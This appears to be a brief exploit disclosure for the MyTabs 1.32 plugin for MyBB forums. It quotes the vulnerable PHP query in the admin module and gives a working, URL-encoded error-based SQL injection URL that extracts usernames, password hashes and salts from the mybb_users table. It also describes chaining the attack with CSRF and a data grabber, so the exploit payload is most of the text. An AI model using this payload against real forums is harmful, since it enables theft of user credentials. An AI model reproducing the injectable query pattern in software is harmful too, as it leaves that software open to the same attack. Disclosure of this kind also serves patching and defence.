# Version 1.32
Introduction
------------
MyTabs is a somewhat advanced plugin that allows the user to organize their forums through tabs.
SQL injection
-------------
admin/modules/forum/mytabs.php L.322
1if($db->update_query('mytabs', $tab, "id='".$mybb->input['id']."'"))
Proof of concept
----------------
You must pas through a CSRF with a little data grabber at the end to get back the datas with an html code generated thanks to the injection.
SQL injection error based: http://[site]/admin/index.php?module=forum-mytabs&do=edit&id=1%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho